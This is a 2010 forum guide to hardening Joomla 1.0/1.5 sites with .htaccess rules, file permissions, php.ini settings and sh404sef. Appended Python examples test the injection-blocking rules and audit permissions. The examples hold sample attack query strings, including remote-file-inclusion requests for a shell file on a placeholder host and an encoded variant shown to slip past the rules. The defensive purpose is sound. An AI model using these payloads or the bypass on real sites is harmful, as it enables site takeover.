Ultimate Security For Joomla, secure your Joomla! CMS
Web Design Seo (Group: Root Admin, Posts: 3,320, Joined: 29-April 09, From: Sofia, Member No.: 1)
Posted Jul 15 2010, 01:56 PM, Post #1

Ultra high security for your Joomla CMS

Quote:
This guide was written in 2010 and is for Joomla 1.5 and Joomla! 1.0 only!


Not that I am such a big security specialist, but I have to deal with this because it is my job. These things work, they have been tested on more than 100 sites, and so far no problems with them have been detected.


How to protect Joomla with high security:

Part 1. Use the latest version. This does not mean you must paranoidly update after every new release - I recommend reading the changelog of the update and updating if the newest version contains security fixes or if something else catches your eye.

Part 2. You must have a working .htaccess file in the public_html directory. "Working" means that after installing Joomla you rename the file htaccess.txt to the standard .htaccess. It protects your site by blocking most of the common attacks at the server level - mainly mosConfig variables in the URL and script injection.

The part of the code in .htaccess responsible for this protection is:
Code:
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Any request matching one of the conditions above is answered with 403 Forbidden
RewriteRule ^(.*)$ index.php [F,L]


Part 3. Configure .htaccess.

Code:
# Deny direct HTTP access to .xml and .ini files. The original pattern "\.xml|\.ini$"
# was anchored only on .ini and matched any name containing ".xml"; this one matches
# exactly these two extensions.
<Files ~ "\.(xml|ini)$">
Order allow,deny
Deny from all
Satisfy all
</Files>
# On Apache 2.4 the three lines inside the block become: Require all denied


This does not allow opening .xml and .ini files by URL to see their content.
Thus, firstly, nobody will steal your language files (for Joomla 1.5) and secondly, more importantly, nobody can see what you use and exactly which version. In the same way you can add more file extensions that should not be visible to everyone (if you think you need it).
Note: The files can still be read by PHP scripts, which means your site will keep working; files with these extensions can simply only be read from within a PHP script.

3.2 Make sure you have this code in .htaccess:
Code:
Options +FollowSymLinks -Indexes

-Indexes means the server will not list the contents of directories that have no index file. If you have a directory on the site without an index.html, nobody but you can see its contents as a listing.

3.3 If you want to stop download managers and some proxies from accessing your site, you need this code:

Code:
# Block proxy and download managers
RewriteCond %{HTTP:VIA}                 !^$ [OR]
RewriteCond %{HTTP:FORWARDED}           !^$ [OR]
RewriteCond %{HTTP:USERAGENT_VIA}       !^$ [OR]
RewriteCond %{HTTP:X_FORWARDED_FOR}     !^$ [OR]
RewriteCond %{HTTP:PROXY_CONNECTION}    !^$ [OR]
RewriteCond %{HTTP:XPROXY_CONNECTION}   !^$ [OR]
RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR]
RewriteCond %{HTTP:XROXY_CONNECTION}    !^$ [OR]
RewriteCond %{HTTP:X-FORWARDED-FOR}     !^$ [OR]
RewriteCond %{HTTP:FORWARDED-FOR}       !^$ [OR]
RewriteCond %{HTTP:X-FORWARDED}         !^$ [OR]
RewriteCond %{HTTP:HTTP_CLIENT_IP}      !^$
RewriteRule ^(.*)$ - [F]

# Block Bad Bots
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule .* - [F]


Warning: this code does not stop most proxies, because part of the check is on the user agent, and most proxies present themselves as a version of Mozilla.

Warning: the code quoted above must be placed below these lines in .htaccess:
Code:
RewriteEngine On
RewriteBase /


Part 4. Make sure you do not have folders with permissions 777 or files with permissions higher than 644. At any self-respecting hosting company the default permissions for newly created folders are 755 and for files 644.
Note: You need not check every folder in your Joomla installation; just make a new folder and see what its permissions are. If they are 755, everything is OK.

Part 5. Move the tmp directory of Joomla! outside public_html. Make a new folder with a complex name of more than 12 letters and symbols. Then edit configuration.php and set the new path there. Then delete the files in the standard tmp directory.

Part 6. Move the logs directory of Joomla! outside public_html. Make a new folder with a complex name of more than 12 letters and symbols. Then edit configuration.php and set the new path there. Then delete the files in the standard logs directory.

Part 7. Move configuration.php outside public_html and secure it!
How to do this:

Step 1: Move configuration.php to another directory outside public_html.
Step 2: Modify the files /includes/defines.php and /administrator/includes/defines.php - this constant: define( 'JPATH_CONFIGURATION', JPATH_ROOT );

If you want to move the file one level up, into a folder named "test", the constant should look like this:
Code:
define( 'JPATH_CONFIGURATION', JPATH_ROOT.DS.'..'.DS.'test' );


Step 3: Make sure that configuration.php is not writable by anyone; the permissions of the file should be 444!

Part 8. Make sure that the following PHP settings on your hosting account are correct:
register_globals - must be Off
register_globals might allow an attacker to take control of hidden variables through poorly written Joomla! extensions.

safe_mode - must be Off.
safe_mode is a security risk; it was supposed to add a new layer of security to PHP, but it ended up creating more bugs.

allow_url_fopen - must be Off
allow_url_fopen might allow an attacker to include his own PHP scripts in your Joomla! website, ultimately taking control of the webserver.

allow_url_include - must be Off
allow_url_include might allow an attacker to include his own PHP scripts in your Joomla! website, ultimately taking control of the webserver.

disable_functions - recommended.
disable_functions disables dangerous PHP functions. It is recommended to disable: show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open

open_basedir - recommended. open_basedir restricts access to specified directories only.

All these things are set by the following code, which we write into a php.ini file placed in public_html.
Code:
; A per-directory php.ini is only read when PHP runs as CGI/FastCGI (e.g. suPHP);
; under mod_php set these with php_flag/php_value in .htaccess or in the global php.ini
register_globals=Off
safe_mode=Off
allow_url_fopen=Off
allow_url_include=Off
; functions that give an uploaded PHP shell a way to run OS commands or disclose source
disable_functions=show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
; restrict file access to the web root; if you moved configuration.php, tmp or logs
; outside public_html (Parts 5-7), add those directories here too, separated by ":"
open_basedir=/home/path_to_your_account/public_html


Note: path_to_your_account is the path to your hosting account.
Second note: some of these settings may be locked globally by your hosting provider and will not take effect; if so, ask them why, and if they will not change it for you, the only really important ones are register_globals and safe_mode.

At the bottom I have attached a sample php.ini file - php.ini.txt. Download it, rename it to php.ini and upload it to public_html.

Part 9. Check whether the admin account is still the default "admin". If so, rename it!
Check whether your password is secure enough! If your password is weak, none of these things make any sense; hackers will simply guess it. A secure password looks something like this: Ttsx#jfn024Rp2Agt5s

Part 10. Change the permissions of these files of your default template:
public_html/templates/your_template/params.ini
public_html/templates/your_template/index.php

The permissions of these files must be 444!

Part 11. Only for Joomla 1.0:

Change the permissions of the language files (such as bulgarian.php, english.php). They must be 444!
The same applies to the index file of your default template - public_html/templates/template/index.php

Part 12. Do not install any junk into your Joomla; the more additional applications you have, the greater the chance of being hacked.

Part 13. I strongly recommend installing sh404sef! It serves not only for rewriting URLs so that your articles rank higher in Google, but also for filtering and protection against certain attacks. You can download the latest free version of the component here.

To activate security:
- Open the configuration: administrator/index.php?option=com_sh404sef&task=showconfig
- To see all the settings, click on the right: Click here to switch to extended display.

Recommended settings:
Go to the Security tab.
Activate security functions - Yes.
Log attacks - Yes.
Months to keep security logs - set 2-3 months; it is advisable to review the logs at least once a week if your site is well visited, or even 1-2 times a day (like me).


Pay attention in the logs to:
script tag in POST = script injection
Image file name with command in URL = remote file inclusion
mosConfig var in URL
Base64 injection
Illegal standard vars

You can then ban the hackers you want in .htaccess. Sample code:
Code:
deny from 89.110.1.195
deny from 89.110.14.105
deny from 89.110.21.155
deny from 89.110.25.55


or whole address ranges (these two lines are from some particularly stubborn Russian hackers)
Code:
# Apache's "Deny from" takes an address, an address prefix or network/mask, not a from-to
# range: 92.100.128.0-92.100.255.255 is 92.100.128.0/17 and 89.110.0.0-89.110.63.255 is 89.110.0.0/18
deny from 92.100.128.0/17
deny from 89.110.0.0/18


Anti-flood configuration
Activate anti-flood - set it to Yes only if your site is exposed to attacks of the type: someone clicking 10 times per second to overload your host. Configure the number of tries, save the settings, and browse the site with Firefox - it is the one that most often gets caught. Note that on a much visited website this always reduces traffic somewhat, because the Google bot sometimes sees an error page.

Project Honey Pot configuration
Use Project Honey Pot - Yes.
I recommend it if your site has up to about 2000 unique visitors daily. Unfortunately, enabling this setting loads the server quite a bit if you have a site with over 4000-5000 uniques (one of ours), and then you have to look for a custom solution.

Register on the Project Honey Pot site and enter your access key. This automatically protects your site from all identified "bad" bots through a blacklist of IP addresses that Project Honey Pot updates daily.

If you use the logs, you may want to disable the option: Log 404 errors. It leads to large amounts of log entries, and if you review them often you will have a really long read :) The setting is located in the Advanced tab of the sh404sef settings.

Part 14. DO NOT install any junk into your Joomla; if you use more extensions, the chance of being hacked is greater.

Part 15. Did you do everything? Congratulations, now you have a great site with the best CMS system in the world, and your website is more secure than at least 90% of the sites on the Internet.

If anyone knows something more valuable than all this, let's share it; it will be added to the first post. Even more paranoid settings for folder and file permissions are possible, but then many features of your site will not work.

Guide is written by Eduard Dimitrov, CEO of 3D Web Design.

Enjoy!

Attached file: php.ini.txt (226 bytes), 8 downloads
 


--------------------
Forum Rules | How to receive support. 3D Web Design: web design, SEO optimisation, Web Site Extensions, Oscommerce Addons, Wordpress plugins and Joomla Extensions; website development, search engine optimisation and SEO services.
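Added example for Part 2 (and the sh404sef log categories of Part 13); this is not code from the original post, from Joomla or from sh404sef. It re-implements the five RewriteCond patterns in Python so they can be run offline against sample query strings. The query strings and the rule labels are constructed for this example, and 203.0.113.5 is a documentation address. Like mod_rewrite's %{QUERY_STRING}, the check runs on the raw, undecoded query string, which is why the last sample (the underscore in mosConfig_ sent as %5F) passes all five rules even though PHP decodes it to the same variable name. That is why these rules are a layer on top of register_globals Off (Part 8), not a replacement for it.

```python
import re

# The five conditions from the Part 2 .htaccess fragment, translated one-to-one
# from Apache's PCRE syntax to Python's re. Only the <script> rule carried [NC]
# (case-insensitive) in the original, so only that one gets re.IGNORECASE.
# The rule labels are ours (constructed), chosen to resemble the sh404sef log names.
RULES = [
    ("mosConfig var in URL", re.compile(r"mosConfig_[a-zA-Z_]{1,21}(=|%3D)")),
    ("base64 injection",     re.compile(r"base64_encode.*\(.*\)")),
    ("script tag in URL",    re.compile(r"(<|%3C).*script.*(>|%3E)", re.IGNORECASE)),
    ("GLOBALS override",     re.compile(r"GLOBALS(=|\[|%[0-9A-Z]{0,2})")),
    ("_REQUEST override",    re.compile(r"_REQUEST(=|\[|%[0-9A-Z]{0,2})")),
]


def check_query(query_string):
    """Return the label of the first rule that fires for this query string, or None.

    Like mod_rewrite's %{QUERY_STRING}, the match runs on the RAW query string:
    nothing is URL-decoded first. PHP, on the other hand, decodes parameter
    names, so an encoded character inside a pattern's literal part slips past.
    """
    for label, pattern in RULES:
        if pattern.search(query_string):
            return label
    return None


# Constructed sample requests (203.0.113.5 is a documentation address, not a real host).
SAMPLE_QUERIES = [
    "option=com_content&view=article&id=12",                           # ordinary Joomla request
    "mosConfig_absolute_path=http://203.0.113.5/shell.txt?",           # 1.0-era remote file inclusion attempt
    "s=base64_encode(cmd)",                                            # base64 payload builder
    "q=%3Cscript%3Ealert(1)%3C/script%3E",                             # URL-encoded <script> tag
    "GLOBALS[mosConfig_absolute_path]=http://203.0.113.5/shell.txt?",  # superglobal poisoning
    "_REQUEST[option]=com_whatever",                                   # _REQUEST poisoning
    "mosConfig%5Fabsolute_path=http://203.0.113.5/shell.txt?",         # same RFI, "_" sent as %5F: not caught
]


def run(queries=SAMPLE_QUERIES):
    """Evaluate every sample and return (query, label-or-None) pairs."""
    return [(q, check_query(q)) for q in queries]


if __name__ == "__main__":
    for query, label in run():
        print(f"{label or 'ALLOWED':<22} {query}")
```

Running the file prints one line per sample with the rule that fired, or ALLOWED; the first and last samples are the two that get through, and only the first one is harmless.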
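Added example for Parts 4, 5, 6, 7 and 10; this is not code from the original post or from Joomla. It is a Python audit of the file-system points in those parts, run against a Joomla-like tree. The script builds a constructed sample site in a temporary directory in the pre-hardening state (a 777 upload folder, a 666 params.ini, a writable configuration.php and template index.php, and tmp_path/log_path still inside public_html), then reports every finding. The JConfig fragment is a constructed sample containing only the two path settings that matter, and the audit assumes configuration.php is still inside public_html; pass its new location as config_file once you have done Part 7.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Constructed Joomla 1.5-style configuration.php fragment; only the two path
# settings the guide cares about are present, everything else is left out.
SAMPLE_CONFIG = """<?php
class JConfig {
    var $sitename = 'Example site';
    var $log_path = '__ROOT__/public_html/logs';
    var $tmp_path = '__ROOT__/public_html/tmp';
}
"""

PATH_SETTING = re.compile(r"var\s+\$(tmp_path|log_path)\s*=\s*'([^']*)'")
READONLY_GLOBS = ("configuration.php", "templates/*/index.php", "templates/*/params.ini")


def build_sample_site(base):
    """Create a constructed, pre-hardening site tree with the mistakes the guide warns about."""
    public_html = base / "public_html"
    for sub in ("images/stories", "templates/mytpl", "logs", "tmp"):
        (public_html / sub).mkdir(parents=True)
    for d in (public_html, *(p for p in public_html.rglob("*") if p.is_dir())):
        os.chmod(d, 0o755)                                    # the hosting default (Part 4)
    files = {
        public_html / "index.php": 0o644,                     # fine
        public_html / "configuration.php": 0o644,             # Part 7 wants 444
        public_html / "templates/mytpl/index.php": 0o644,     # Part 10 wants 444
        public_html / "templates/mytpl/params.ini": 0o666,    # Part 4: above 644
    }
    for path, mode in files.items():
        body = SAMPLE_CONFIG.replace("__ROOT__", str(base)) if path.name == "configuration.php" else "<?php\n"
        path.write_text(body)
        os.chmod(path, mode)
    os.chmod(public_html / "images/stories", 0o777)           # Part 4: world-writable folder
    return public_html


def audit_permissions(public_html):
    """Part 4: report folders above 755 and files above 644."""
    findings = []
    for dirpath, _, filenames in os.walk(public_html):
        d = Path(dirpath)
        mode = stat.S_IMODE(d.stat().st_mode)
        if mode & ~0o755:
            findings.append(f"dir {d.relative_to(public_html)} has mode {mode:o}, expected 755")
        for name in filenames:
            f = d / name
            mode = stat.S_IMODE(f.stat().st_mode)
            if mode & ~0o644:
                findings.append(f"file {f.relative_to(public_html)} has mode {mode:o}, expected 644 or lower")
    return findings


def audit_readonly(public_html):
    """Parts 7 and 10: configuration.php and the template's index.php/params.ini must be 444."""
    findings = []
    for pattern in READONLY_GLOBS:
        for f in public_html.glob(pattern):
            mode = stat.S_IMODE(f.stat().st_mode)
            if mode & 0o222:                                  # writable by owner, group or other
                findings.append(f"{f.relative_to(public_html)} has mode {mode:o}, must be 444 (read-only)")
    return findings


def audit_paths(public_html, config_file=None):
    """Parts 5 and 6: tmp_path and log_path must point outside the web root."""
    config_file = config_file or public_html / "configuration.php"
    if not config_file.exists():
        return []
    root = public_html.resolve()
    findings = []
    for setting, value in PATH_SETTING.findall(config_file.read_text()):
        target = Path(value).resolve()
        if target == root or root in target.parents:
            findings.append(f"{setting} = {value} points inside the web root")
    return findings


def audit_site(public_html, config_file=None):
    """Run all three checks and return the combined list of findings."""
    return (audit_permissions(public_html) + audit_readonly(public_html)
            + audit_paths(public_html, config_file))


def demo():
    """Build the constructed tree in a fresh temp dir and audit it."""
    return audit_site(build_sample_site(Path(tempfile.mkdtemp())))


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Against the sample tree the audit prints seven findings: the 777 folder and the 666 params.ini from the permission check, the three writable files from the read-only check, and both paths from the configuration check. To audit a real site, call audit_site(Path("/home/account/public_html")) instead of demo().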
Web Design Seo (Root Admin)
Posted Sep 25 2010, 09:26 AM, Post #2

This will help you too: How To Remove Joomla Fingerprints, New Joomla 1.5.26 And Joomla 2.5 JCE Exploit and Remote File Inclusion Protection Code For .htaccess.

You can read here other htaccess guides also.

